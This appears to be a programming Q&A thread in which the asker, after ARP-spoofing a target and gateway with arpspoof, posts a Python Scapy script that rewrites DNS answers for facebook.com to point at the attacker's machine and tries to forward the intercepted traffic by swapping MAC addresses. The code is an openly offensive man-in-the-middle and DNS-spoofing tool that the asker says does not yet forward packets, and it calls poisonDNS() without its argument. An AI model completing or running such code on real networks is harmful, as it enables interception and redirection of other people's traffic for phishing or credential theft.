# Scapy - How to forward packets after using arpspoof?

Tags: python-3.x, dns, scapy, forwarding, arp

I want to poison dns cache of a machine. First I used `arpspoof -i wlan0 -t target_ip -r gateway_ip`

I know I could forward the traffic using `sysctl -w net.ipv4.ip_forward=1`, but then I wouldn't be able to modify dns packets since they are already forwarded.

I need to forward packets using Scapy. By only changing MAC addresses of the packets like in the code below, the forwarding doesn't work.

What I want is to achieve what `sysctl -w net.ipv4.ip_forward=1` does, after poisoning DNS cache of the target.

I tried this:

```
from scapy.all import *

gateway_mac = "x:x:x:x:x:x"
target_ip = "192.168.43.97"
target_mac = "x:x:x:x:x:x"
local_ip = "192.168.43.132"
local_mac = "x:x:x:x:x:x"

def poisonDNS(packet):
    if packet.haslayer(DNS):
        if packet.haslayer(DNSRR):
            qname = packet[DNS].qd.qname.decode('utf-8')
            ancount = packet[DNS].ancount
            dns_id = packet[DNS].id
            rr = packet.getlayer(DNSRR)

            for i in range(ancount):
                rrname = rr[i].rrname.decode('utf-8')
                rrtype = rr.get_field('type').i2repr(rr, rr.type)
                rrdata = rr[i].rdata
                if type(rrdata) == bytes:
                    rrdata = rrdata.decode("utf-8")
                if 'facebook.com' in rrname and rrtype == 'A':
                    print("Poisoning target's DNS cache")
                    packet[DNS].an[i].rdata = '192.168.43.132'
                    packet.show()
                    print("Successfully poisoned target's DNS cache")

def forwardPacket(packet):
    if packet.haslayer(Ether):
        src_mac = packet[Ether].src
        dst_mac = packet[Ether].dst

        if src_mac == target_mac.lower() and dst_mac == local_mac.lower():
            # Target --> Local ==> Local --> Gateway
            packet[Ether].src = local_mac.lower()
            packet[Ether].dst = gateway_mac.lower()
        elif src_mac == gateway_mac.lower() and dst_mac == local_mac.lower():
            # Gateway --> Local ==> Local --> Target
            packet[Ether].src = local_mac.lower()
            packet[Ether].dst = target_mac.lower()

    sendp(packet)



def packet_callback(packet):
    # Poison DNS
    poisonDNS()

    # Forward packets
    forwardPacket(packet)


sniff(prn=packet_callback, store=0)
```

This doesn't work. The requests dont go through
What am I doing wrong? How can I forward the traffic in Scapy?

Comment: I am not sure what makes you think so. ARP is the protocol with which the hosts know which IP address belongs to which MAC address. DNS resolves domain names to their IP addresses. I already poisoned the ARP cache of both the gateway and the target using `arpspoof`. I try to forward packets like `sysctl -w net.ipv4.ip_forward` does, after modifying the DNS packets. Would you please specify what should I look for?

Comment: My bad. The first paragraph of your question could be clearer in terms of the total scope of what you're trying to do (i.e. I want to do W by doing X, Y, Z). `# change dns records ` => I'm assuming there's code here that is summarized by the comment? It would be useful to see what that is, as it's relevant to your question.

Comment: I updated the code. The DNS poisoning step can be somewhat ignored because the main problem I have is that I can't forward the packets. The DNS poisoning works fine, I checked and the packets changes to what I want. When I try the code, I comment out the DNS poisoning code so that I focus only on forwarding packets.